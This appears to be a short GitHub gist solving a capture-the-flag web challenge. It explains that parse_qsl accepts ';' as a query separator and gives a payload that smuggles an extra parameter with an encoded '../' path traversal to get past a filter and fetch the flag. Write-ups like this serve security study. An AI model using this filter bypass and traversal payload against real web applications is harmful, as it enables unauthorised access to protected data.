Skip to content

Instantly share code, notes, and snippets.

@sqrtrev
Created March 29, 2022 03:12
Show Gist options
  • Save sqrtrev/b47214a8b40f1e58aa1a2e530953afd8 to your computer and use it in GitHub Desktop.
Save sqrtrev/b47214a8b40f1e58aa1a2e530953afd8 to your computer and use it in GitHub Desktop.
We can make more query variable using `;`. So, We can bypass the filtering.
(they are using parse_qsl for getting query)
Payload:
/view?{MyClienID}=flag;/%2e%2e/=123
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment